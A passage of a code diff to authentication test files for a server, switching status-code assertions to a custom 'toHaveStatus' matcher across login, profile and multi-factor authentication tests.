     // Try to login as a Patient
@@ -457,7 +457,7 @@ describe('Login', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.code).toBeDefined();
   });
 
@@ -486,7 +486,7 @@ describe('Login', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.code).toBeDefined();
 
     // Try to login with mixed case email
@@ -498,7 +498,7 @@ describe('Login', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.code).toBeDefined();
   });
 
@@ -511,7 +511,7 @@ describe('Login', () => {
       scope: 'openid',
       projectId: otherTestProject.project.id,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.login).toBeUndefined();
     expect(res.body.code).toBeUndefined();
     expect(res.body.memberships).toBeUndefined();
@@ -546,7 +546,7 @@ describe('Login', () => {
       codeChallengeMethod: 'plain',
       projectId: project.id,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.login).toBeUndefined();
     expect(res.body.code).toBeUndefined();
     expect(res.body.memberships).toBeUndefined();
@@ -560,7 +560,7 @@ describe('Login', () => {
       password,
       scope: 'openid',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.code).toBeDefined();
   });
 
@@ -571,7 +571,7 @@ describe('Login', () => {
       password,
       scope: 'openid',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.code).toBeDefined();
   });
 
@@ -582,7 +582,7 @@ describe('Login', () => {
       password,
       scope: 'openid',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Invalid origin');
   });
 });

--- a/packages/server/src/auth/me.test.ts
+++ b/packages/server/src/auth/me.test.ts
@@ -27,7 +27,7 @@ describe('Me', () => {
 
   test('Unauthenticated', async () => {
     const res = await request(app).get('/auth/me');
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('User configuration', async () => {
@@ -45,7 +45,7 @@ describe('Me', () => {
 
     // Get the user profile with default user configuration
     const res2 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toBeDefined();
     expect(res2.body.profile).toBeDefined();
     expect(res2.body.profile.resourceType).toBe('Practitioner');
@@ -67,7 +67,7 @@ describe('Me', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send(config);
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
     expect(res3.body.resourceType).toBe('UserConfiguration');
     expect(res3.body.id).toBeDefined();
     expect(res3.body).toMatchObject(config);
@@ -76,7 +76,7 @@ describe('Me', () => {
     const res4 = await request(app)
       .get(`/admin/projects/${project.id}/members/${membership.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.resourceType).toBe('ProjectMembership');
 
     // Update the project membership
@@ -88,7 +88,7 @@ describe('Me', () => {
         ...res4.body,
         userConfiguration: createReference(res3.body),
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
 
     // As super admin user, add an identifier to the user
     const systemRepo = await getProjectSystemRepo(project);
@@ -102,7 +102,7 @@ describe('Me', () => {
 
     // Reload the user profile with the new user configuration
     const res6 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     expect(res6.body).toBeDefined();
     expect(res6.body.config).toMatchObject(config);
     expect(res6.body.security).toBeDefined();
@@ -130,7 +130,7 @@ describe('Me', () => {
 
     // Get the user profile with default user configuration
     const res2 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toBeDefined();
     expect(res2.body.profile).toBeDefined();
     expect(res2.body.profile.resourceType).toBe('Practitioner');
@@ -148,7 +148,7 @@ describe('Me', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send(config);
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
     expect(res3.body.resourceType).toBe('UserConfiguration');
     expect(res3.body.id).toBeDefined();
     expect(res3.body).toMatchObject(config);
@@ -157,7 +157,7 @@ describe('Me', () => {
     const res4 = await request(app)
       .get(`/admin/projects/${project.id}/members/${membership.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.resourceType).toBe('ProjectMembership');
 
     // Update the project membership
@@ -169,11 +169,11 @@ describe('Me', () => {
         ...res4.body,
         userConfiguration: createReference(res3.body),
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
 
     // Reload the user profile with the new user configuration
     const res6 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     expect(res6.body).toBeDefined();
     expect(res6.body.config.menu).toBeDefined();
     expect(res2.body.config.menu).toMatchObject(getUserConfigurationMenu(project, membership));
@@ -193,7 +193,7 @@ describe('Me', () => {
     const res = await request(app)
       .get('/auth/me')
       .set('Authorization', 'Basic ' + Buffer.from(client.id + ':' + client.secret).toString('base64'));
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.error).toBeUndefined();
   });
 
@@ -208,7 +208,7 @@ describe('Me', () => {
     );
 
     const res = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toBeDefined();
     expect(res.body.accessPolicy).toBeDefined();
     expect(res.body.accessPolicy.basedOn).toBeDefined();
@@ -233,7 +233,7 @@ describe('Me', () => {
 
     // Get the user profile the initial memberships
     const res1 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body).toBeDefined();
     expect(res1.body.security.memberships).toHaveLength(1);
     expect(res1.body.security.memberships[0]).toMatchObject({
@@ -256,7 +256,7 @@ describe('Me', () => {
 
     // Reload the user profile with the new user memberships
     const res2 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toBeDefined();
     expect(res2.body.security.memberships).toHaveLength(2);
 
@@ -275,7 +275,7 @@ describe('Me', () => {
 
     // Reload, should only see the 2 memberships from the original project
     const res3 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body).toBeDefined();
     expect(res3.body.security.memberships).toHaveLength(2);
 
@@ -291,7 +291,7 @@ describe('Me', () => {
 
     // Reload, should only see the 1 active membership
     const res4 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body).toBeDefined();
     expect(res4.body.security.memberships).toHaveLength(1);
   });
@@ -320,7 +320,7 @@ describe('Me', () => {
     });
 
     const res = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.project).toMatchObject({
       resourceType: 'Project',
       id: project.id,
@@ -348,7 +348,7 @@ describe('Me', () => {
 
     // By default MFA is not required.
     const res1 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`);
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.security.mfaRequired).toBe(false);
 
     // Enabling the project setting makes MFA required for the user.

--- a/packages/server/src/auth/method.test.ts
+++ b/packages/server/src/auth/method.test.ts
@@ -24,17 +24,17 @@ describe('Method', () => {
 
   test('Missing email parameter', async () => {
     const res = await request(app).post('/auth/method').type('json').send({});
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Empty email parameter', async () => {
     const res = await request(app).post('/auth/method').type('json').send({ email: '' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Invalid email parameter', async () => {
     const res = await request(app).post('/auth/method').type('json').send({ email: 'xyz' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Domain config', async () => {
@@ -58,14 +58,14 @@ describe('Method', () => {
       .post('/auth/method')
       .type('json')
       .send({ email: 'alice@' + domain });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     // Domain config not found
     const res2 = await request(app)
       .post('/auth/method')
       .type('json')
       .send({ email: 'alice@' + randomUUID() + '.com' });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 
   test('Domain config case sensitivity', async () => {
@@ -89,7 +89,7 @@ describe('Method', () => {
       .post('/auth/method')
       .type('json')
       .send({ email: 'alice@' + domain.toUpperCase() });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
   });
 
   test('Domain config authorize url without protocol', async () => {
@@ -113,13 +113,13 @@ describe('Method', () => {
       .post('/auth/method')
       .type('json')
       .send({ email: 'alice@' + domain });
-    expect(res1.status).toBe(400);
+    expect(res1).toHaveStatus(400);
 
     // Domain config not found
     const res2 = await request(app)
       .post('/auth/method')
       .type('json')
       .send({ email: 'alice@' + randomUUID() + '.com' });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 });

--- a/packages/server/src/auth/mfa.test.ts
+++ b/packages/server/src/auth/mfa.test.ts
@@ -123,7 +123,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ token: authenticator.generate('1234567890') });
-    expect(res1.status).toBe(400);
+    expect(res1).toHaveStatus(400);
     expect(res1.body.issue[0].details.text).toBe('Secret not found');
 
     // Start new login
@@ -132,7 +132,7 @@ describe('MFA', () => {
       password,
       scope: 'openid',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.login).toBeDefined();
 
     // Try to verify before enrolling, should fail
@@ -141,12 +141,12 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ login: res2.body.login, token: authenticator.generate('1234567890') });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body.issue[0].details.text).toBe('User not enrolled in MFA');
 
     // Get MFA status, should be disabled
     const res4 = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body).toBeDefined();
     expect(res4.body.enrolled).toBe(false);
     expect(res4.body.enrollUri).toBeDefined();
@@ -155,7 +155,7 @@ describe('MFA', () => {
 
     // Get MFA status again, should be the same enroll URI
     const res5 = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     expect(res5.body).toBeDefined();
     expect(res5.body.enrollUri).toBe(res4.body.enrollUri);
 
@@ -165,7 +165,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ token: '1234567890' });
-    expect(res6.status).toBe(400);
+    expect(res6).toHaveStatus(400);
     expect(res6.body.issue[0].details.text).toBe('Invalid token');
 
     // Enroll MFA
@@ -174,7 +174,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ token: authenticator.generate(secret) });
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
 
     // Try to enroll again, should fail
     const res8 = await request(app)
@@ -182,12 +182,12 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ token: authenticator.generate(secret) });
-    expect(res8.status).toBe(400);
+    expect(res8).toHaveStatus(400);
     expect(res8.body.issue[0].details.text).toBe('Already enrolled');
 
     // Get MFA status, should be enrolled
     const res9 = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
-    expect(res9.status).toBe(200);
+    expect(res9).toHaveStatus(200);
     expect(res9.body).toBeDefined();
     expect(res9.body.enrolled).toBe(true);
 
@@ -197,7 +197,7 @@ describe('MFA', () => {
       password,
       scope: 'openid',
     });
-    expect(res10.status).toBe(200);
+    expect(res10).toHaveStatus(200);
     expect(res10.body.login).toBeDefined();
     expect(res10.body.code).not.toBeDefined();
 
@@ -207,7 +207,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ login: res10.body.login, token: '' });
-    expect(res11.status).toBe(400);
+    expect(res11).toHaveStatus(400);
     expect(res11.body.issue[0].details.text).toBe('Missing token');
 
     // Verify with invalid token, should fail
@@ -216,7 +216,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ login: res10.body.login, token: '1234567890' });
-    expect(res12.status).toBe(400);
+    expect(res12).toHaveStatus(400);
     expect(res12.body.issue[0].details.text).toBe('Invalid MFA token');
 
     // Verify MFA success
@@ -225,7 +225,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ login: res10.body.login, token: authenticator.generate(secret) });
-    expect(res13.status).toBe(200);
+    expect(res13).toHaveStatus(200);
     expect(res13.body.login).toBeDefined();
     expect(res13.body.code).toBeDefined();
   });
@@ -254,12 +254,12 @@ describe('MFA', () => {
       .send({
         token: '123',
       });
-    expect(res1.status).toBe(400);
+    expect(res1).toHaveStatus(400);
     expect(res1.body).toMatchObject(badRequest('User not enrolled in MFA'));
 
     // Get status; should not be enrolled and should get a secret
     const res2 = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.enrolled).toBe(false);
     expect(res2.body).toBeDefined();
     expect(res2.body.enrollUri).toBeDefined();
@@ -270,12 +270,12 @@ describe('MFA', () => {
       password,
       scope: 'openid',
     });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.login).toBeDefined();
 
     // Get MFA status, should be disabled
     const res4 = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body).toBeDefined();
     expect(res4.body.enrolled).toBe(false);
     expect(res4.body.enrollUri).toBeDefined();
@@ -288,14 +288,14 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ token: authenticator.generate(secret) });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
 
     // Call disable without token, should fail
     const res6 = await request(app)
       .post('/auth/mfa/disable')
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json');
-    expect(res6.status).toBe(400);
+    expect(res6).toHaveStatus(400);
     expect(res6.body).toMatchObject(badRequest('Missing token'));
 
     // Call disable with invalid token, should fail
@@ -304,7 +304,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ token: 'invalid' });
-    expect(res7.status).toBe(400);
+    expect(res7).toHaveStatus(400);
     expect(res7.body).toMatchObject(badRequest('Invalid token'));
 
     // Call disable with token, should succeed
@@ -313,12 +313,12 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ token: authenticator.generate(secret) });
-    expect(res8.status).toBe(200);
+    expect(res8).toHaveStatus(200);
     expect(res8.body).toMatchObject(allOk);
 
     // Get status should not be enrolled and should have a new secret
     const res9 = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
-    expect(res9.status).toBe(200);
+    expect(res9).toHaveStatus(200);
     expect(res9.body.enrolled).toBe(false);
     expect(res9.body).toBeDefined();
     expect(res9.body.enrollUri).not.toBe(res4.body.enrollUri);
@@ -333,7 +333,7 @@ describe('MFA', () => {
       .send({
         token: authenticator.generate(secret2),
       });
-    expect(res10.status).toBe(400);
+    expect(res10).toHaveStatus(400);
     expect(res10.body).toMatchObject(badRequest('User not enrolled in MFA'));
   });
 
@@ -357,7 +357,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'email' });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('MFA method not allowed'));
   });
 
@@ -379,7 +379,7 @@ describe('MFA', () => {
 
     // Status should advertise email as an allowed (but not yet enrolled) method
     const statusRes = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
-    expect(statusRes.status).toBe(200);
+    expect(statusRes).toHaveStatus(200);
     expect(statusRes.body.enrolled).toBe(false);
     expect(statusRes.body.allowedMethods).toEqual(expect.arrayContaining(['totp', 'email']));
 
@@ -388,14 +388,14 @@ describe('MFA', () => {
 
     // Status should now report email enrollment
     const status2 = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
-    expect(status2.status).toBe(200);
+    expect(status2).toHaveStatus(200);
     expect(status2.body.enrolled).toBe(true);
     expect(status2.body.enrolledMethods).toEqual(['email']);
 
     // Logging in should require MFA and email a verification code automatically
     mockSESv2Client.resetHistory();
     const loginRes = await request(app).post('/auth/login').type('json').send({ email, password, scope: 'openid' });
-    expect(loginRes.status).toBe(200);
+    expect(loginRes).toHaveStatus(200);
     expect(loginRes.body.login).toBeDefined();
     expect(loginRes.body.code).not.toBeDefined();
     expect(loginRes.body.mfaRequired).toBe(true);
@@ -411,14 +411,14 @@ describe('MFA', () => {
       .post('/auth/mfa/verify')
       .type('json')
       .send({ login: loginRes.body.login, token: '000000' === code ? '111111' : '000000' });
-    expect(badVerify.status).toBe(400);
+    expect(badVerify).toHaveStatus(400);
 
     // Verifying with the emailed code completes the login
     const verifyRes = await request(app)
       .post('/auth/mfa/verify')
       .type('json')
       .send({ login: loginRes.body.login, token: code });
-    expect(verifyRes.status).toBe(200);
+    expect(verifyRes).toHaveStatus(200);
     expect(verifyRes.body.code).toBeDefined();
   });
 
@@ -450,7 +450,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'email' });
-    expect(noToken.status).toBe(400);
+    expect(noToken).toHaveStatus(400);
     expect(noToken.body).toMatchObject(badRequest('Missing token'));
 
     // Request the verification code, but try to enroll with the wrong one
@@ -459,7 +459,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({});
-    expect(challengeRes.status).toBe(200);
+    expect(challengeRes).toHaveStatus(200);
     const code = await getCodeFromEmail();
 
     const wrongToken = await request(app)
@@ -467,7 +467,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'email', token: '000000' === code ? '111111' : '000000' });
-    expect(wrongToken.status).toBe(400);
+    expect(wrongToken).toHaveStatus(400);
     expect(wrongToken.body).toMatchObject(badRequest('Invalid token'));
 
     // The user is still not enrolled or email-verified
@@ -482,7 +482,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'email', token: code });
-    expect(enrollRes.status).toBe(200);
+    expect(enrollRes).toHaveStatus(200);
     expect(enrollRes.body).toMatchObject(allOk);
 
     const status2 = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
@@ -498,7 +498,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'email', token: code });
-    expect(reuse.status).toBe(400);
+    expect(reuse).toHaveStatus(400);
     expect(reuse.body).toMatchObject(badRequest('Already enrolled'));
   });
 
@@ -534,7 +534,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({});
-    expect(challengeRes.status).toBe(200);
+    expect(challengeRes).toHaveStatus(200);
     const code = await getCodeFromEmail();
 
     // ...meanwhile the access token refreshes, rotating the refresh secret from
@@ -552,7 +552,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'email', token: code });
-    expect(enrollRes.status).toBe(200);
+    expect(enrollRes).toHaveStatus(200);
     expect(enrollRes.body).toMatchObject(allOk);
   });
 
@@ -593,7 +593,7 @@ describe('MFA', () => {
       .post('/auth/mfa/verify')
       .type('json')
       .send({ login: loginRes.body.login, token: code });
-    expect(verifyRes.status).toBe(200);
+    expect(verifyRes).toHaveStatus(200);
     expect(verifyRes.body.code).toBeDefined();
 
     // Entering the emailed code proves the user controls the email address
@@ -638,7 +638,7 @@ describe('MFA', () => {
       .post('/auth/mfa/verify')
       .type('json')
       .send({ login: loginRes.body.login, token: code });
-    expect(verifyRes.status).toBe(400);
+    expect(verifyRes).toHaveStatus(400);
     expect(verifyRes.body).toMatchObject(badRequest('MFA code expired'));
   });
 
@@ -667,7 +667,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'totp', token: authenticator.generate(totpSecret) });
-    expect(enrollTotp.status).toBe(200);
+    expect(enrollTotp).toHaveStatus(200);
 
     // Add email as a second method (reverifying the email via a code)
     await enrollEmailMfa(accessToken);
@@ -678,7 +678,7 @@ describe('MFA', () => {
     // Login should require MFA and report both methods, WITHOUT auto-sending an email
     mockSESv2Client.resetHistory();
     const loginRes = await request(app).post('/auth/login').type('json').send({ email, password, scope: 'openid' });
-    expect(loginRes.status).toBe(200);
+    expect(loginRes).toHaveStatus(200);
     expect(loginRes.body.mfaRequired).toBe(true);
     expect(loginRes.body.mfaMethods).toEqual(expect.arrayContaining(['totp', 'email']));
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(0);
@@ -688,7 +688,7 @@ describe('MFA', () => {
       .post('/auth/mfa/verify')
       .type('json')
       .send({ login: loginRes.body.login, token: authenticator.generate(totpSecret) });
-    expect(totpVerify.status).toBe(200);
+    expect(totpVerify).toHaveStatus(200);
     expect(totpVerify.body.code).toBeDefined();
   });
 
@@ -723,7 +723,7 @@ describe('MFA', () => {
     // Request a verification code to use email instead of TOTP
     mockSESv2Client.resetHistory();
     const sendRes = await request(app).post('/auth/mfa/send-email').type('json').send({ login: loginRes.body.login });
-    expect(sendRes.status).toBe(200);
+    expect(sendRes).toHaveStatus(200);
     expect(sendRes.body).toMatchObject(allOk);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
@@ -733,13 +733,13 @@ describe('MFA', () => {
       .post('/auth/mfa/verify')
       .type('json')
       .send({ login: loginRes.body.login, token: code });
-    expect(verifyRes.status).toBe(200);
+    expect(verifyRes).toHaveStatus(200);
     expect(verifyRes.body.code).toBeDefined();
   });
 
   test('send-email requires a login', async () => {
     const res = await request(app).post('/auth/mfa/send-email').type('json').send({});
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Missing login');
   });
 
@@ -770,7 +770,7 @@ describe('MFA', () => {
     });
 
     const res = await request(app).post('/auth/mfa/send-email').type('json').send({ login: loginRes.body.login });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Login revoked'));
   });
 
@@ -801,7 +801,7 @@ describe('MFA', () => {
     });
 
     const res = await request(app).post('/auth/mfa/send-email').type('json').send({ login: loginRes.body.login });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Login granted'));
   });
 
@@ -832,7 +832,7 @@ describe('MFA', () => {
     });
 
     const res = await request(app).post('/auth/mfa/send-email').type('json').send({ login: loginRes.body.login });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Login already verified'));
   });
 
@@ -863,7 +863,7 @@ describe('MFA', () => {
     expect(loginRes.body.mfaRequired).toBe(true);
 
     const res = await request(app).post('/auth/mfa/send-email').type('json').send({ login: loginRes.body.login });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('User not enrolled in email MFA'));
   });
 
@@ -891,7 +891,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({});
-    expect(noToken.status).toBe(400);
+    expect(noToken).toHaveStatus(400);
     expect(noToken.body).toMatchObject(badRequest('Missing token'));
 
     // Request an emailed verification code
@@ -900,7 +900,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({});
-    expect(challengeRes.status).toBe(200);
+    expect(challengeRes).toHaveStatus(200);
     const code = await getCodeFromEmail();
 
     // A wrong code is rejected
@@ -909,7 +909,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ token: '000000' });
-    expect(wrongCode.status).toBe(400);
+    expect(wrongCode).toHaveStatus(400);
     expect(wrongCode.body).toMatchObject(badRequest('Invalid token'));
 
     // The emailed code disables MFA
@@ -918,7 +918,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ token: code });
-    expect(disableRes.status).toBe(200);
+    expect(disableRes).toHaveStatus(200);
     expect(disableRes.body).toMatchObject(allOk);
 
     const status = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
@@ -954,7 +954,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({});
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Email MFA not available'));
   });
 
@@ -1006,7 +1006,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'email' });
-    expect(noToken.status).toBe(400);
+    expect(noToken).toHaveStatus(400);
     expect(noToken.body).toMatchObject(badRequest('Missing token'));
 
     // Remove the email factor
@@ -1015,7 +1015,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'email', token: authenticator.generate(secret) });
-    expect(removeRes.status).toBe(200);
+    expect(removeRes).toHaveStatus(200);
     expect(removeRes.body).toMatchObject(allOk);
 
     // Still enrolled, but only in TOTP now
@@ -1046,7 +1046,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'totp', token: authenticator.generate(secret) });
-    expect(removeRes.status).toBe(200);
+    expect(removeRes).toHaveStatus(200);
 
     // Still enrolled in email; the authenticator secret was rotated
     const status = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
@@ -1085,7 +1085,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'email', token: code });
-    expect(removeRes.status).toBe(200);
+    expect(removeRes).toHaveStatus(200);
 
     const status = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
     expect(status.body.enrolled).toBe(false);
@@ -1122,7 +1122,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'totp', token: code });
-    expect(removeRes.status).toBe(200);
+    expect(removeRes).toHaveStatus(200);
 
     const status = await request(app).get('/auth/mfa/status').set('Authorization', `Bearer ${accessToken}`);
     expect(status.body.enrolled).toBe(true);
@@ -1134,7 +1134,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ token: code });
-    expect(reuse.status).toBe(400);
+    expect(reuse).toHaveStatus(400);
     expect(reuse.body).toMatchObject(badRequest('Invalid token'));
   });
 
@@ -1160,7 +1160,7 @@ describe('MFA', () => {
       .set('Authorization', `Bearer ${accessToken}`)
       .type('json')
       .send({ method: 'sms', token: authenticator.generate(secret) });
-    expect(badMethod.status).toBe(400);
+    expect(badMethod).toHaveStatus(400);
     expect(badMethod.body).toMatchObject(badRequest('Invalid method'));
   });
 
@@ -1313,7 +1313,7 @@ describe('MFA', () => {
     }
 
     const res = await request(app).post('/auth/login').type('json').send({ email, password, scope: 'openid' });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     if (enroll) {
       expect(res.body.mfaEnrollRequired).toBe(true);
       expect(res.body.code).toBeUndefined();
@@ -1357,7 +1357,7 @@ describe('MFA', () => {
     // The password step has no concrete project yet, so it is not gated; the
     // user is asked to pick a membership.
     const login = await request(app).post('/auth/login').type('json').send({ email, password, scope: 'openid' });
-    expect(login.status).toBe(200);
+    expect(login).toHaveStatus(200);
     expect(login.body.code).toBeUndefined();
     expect(login.body.mfaEnrollRequired).toBeUndefined();
     expect(login.body.memberships).toHaveLength(2);
@@ -1370,7 +1370,7 @@ describe('MFA', () => {
       .post('/auth/profile')
       .type('json')
       .send({ login: login.body.login, profile: membershipB.id });
-    expect(profileRes.status).toBe(200);
+    expect(profileRes).toHaveStatus(200);
     expect(profileRes.body.code).toBeDefined();
     expect(profileRes.body.mfaEnrollRequired).toBeUndefined();
   });
@@ -1390,7 +1390,7 @@ describe('MFA', () => {
       .post('/auth/profile')
       .type('json')
       .send({ login: login.body.login, profile: membershipA.id });
-    expect(profileRes.status).toBe(200);
